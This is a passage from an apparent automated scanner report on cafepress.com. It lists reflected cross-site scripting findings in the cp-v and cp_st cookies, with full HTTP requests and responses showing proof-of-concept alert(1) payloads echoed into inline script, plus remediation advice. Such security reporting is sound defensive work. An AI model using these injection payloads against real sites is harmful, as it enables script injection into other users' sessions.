Echoing user-controllable data within a script context is inherently dangerous and cannot be made safe by HTML entity encoding, because the HTML parser does not decode entities inside a script element. Where possible, the application should not place user data inside inline script at all: emit it in an HTML-attribute-encoded data attribute or in a script element of type application/json and have trusted script read it from the DOM. If the value must appear inside a JavaScript string literal, encode it for that context at the point of output by escaping every character outside a small safe set of letters and digits as \xHH or \uHHHH; that neutralises quotes, backslashes, the '<' and '/' that form the </script break-out, and the U+2028 and U+2029 line terminators.
Request
GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ae66d</script><script>alert(1)</script>eabb41eb2b2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59702
Date: Sun, 26 Dec 2010 13:46:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]... = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'ae66d</script><script>alert(1)</script>eabb41eb2b2 '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-thongs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal enclosed in double quotation marks. The payload 5d1e3"-alert(1)-"b1f51daa56d was submitted in the cp-v cookie, appended to the existing cookie value, and was echoed unmodified in the application's response inside the assignment to s.eVar30. The first double quote in the payload terminates the string literal, -alert(1)- is then parsed as a subtraction whose operand is a function call, and the final double quote opens a new string that absorbs the remainder of the original literal, so the statement stays syntactically valid and alert(1) runs as the page loads. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the tainted data arrives in a cookie rather than in the URL or a request body, exploiting it against another user requires a way to set that cookie in the victim's browser. The Set-Cookie headers in the response scope these cookies to domain=cafepress.com, so script execution on any host under that domain, or a header-injection flaw that lets an attacker emit a Set-Cookie header, would provide that capability. This prerequisite is why the finding is rated Information rather than High; the reflection itself is confirmed (Confidence: Certain).
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and cannot be made safe by HTML entity encoding, because the HTML parser does not decode entities inside a script element. Where possible, the application should not place user data inside inline script at all: emit it in an HTML-attribute-encoded data attribute or in a script element of type application/json and have trusted script read it from the DOM. If the value must appear inside a JavaScript string literal, encode it for that context at the point of output by escaping every character outside a small safe set of letters and digits as \xHH or \uHHHH; that neutralises quotes, backslashes, the '<' and '/' that form the </script break-out, and the U+2028 and U+2029 line terminators.
Request
GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59312
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-thongs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string literal enclosed in single quotation marks. The payload 5b983</script><script>alert(1)</script>ebe8ab7f2c6 was submitted in the cp_st cookie and was echoed unmodified in the application's response. The payload does not need to terminate the single-quoted string: the HTML parser ends a script element at the first </script sequence it sees, whatever the JavaScript string state, so the injected <script>alert(1)</script> becomes a new script element that the browser executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the tainted data arrives in a cookie rather than in the URL or a request body, exploiting it against another user requires a way to set that cookie in the victim's browser. The Set-Cookie headers in the response scope these cookies to domain=cafepress.com, so script execution on any host under that domain, or a header-injection flaw that lets an attacker emit a Set-Cookie header, would provide that capability. This prerequisite is why the finding is rated Information rather than High; the reflection itself is confirmed (Confidence: Certain).
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and cannot be made safe by HTML entity encoding, because the HTML parser does not decode entities inside a script element. Where possible, the application should not place user data inside inline script at all: emit it in an HTML-attribute-encoded data attribute or in a script element of type application/json and have trusted script read it from the DOM. If the value must appear inside a JavaScript string literal, encode it for that context at the point of output by escaping every character outside a small safe set of letters and digits as \xHH or \uHHHH; that neutralises quotes, backslashes, the '<' and '/' that form the </script break-out, and the U+2028 and U+2029 line terminators.
Request
GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=5b983</script><script>alert(1)</script>ebe8ab7f2c6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59334 Date: Sun, 26 Dec 2010 13:47:23 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/ Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '5b983</script><script>alert(1)</script>ebe8ab7f2c6 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+yoga-mats
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa7a8"-alert(1)-"e7fc2e4ad80 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+yoga-mats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59513 Date: Sun, 26 Dec 2010 13:49:05 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/ Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59513 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+yoga-mats
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f3e8</script><script>alert(1)</script>edf8d16990b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+yoga-mats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4f3e8</script><script>alert(1)</script>edf8d16990b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 59529 Date: Sun, 26 Dec 2010 13:49:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59529 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '4f3e8</script><script>alert(1)</script>edf8d16990b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /TheGamingApe
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"6e0c4f15927 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
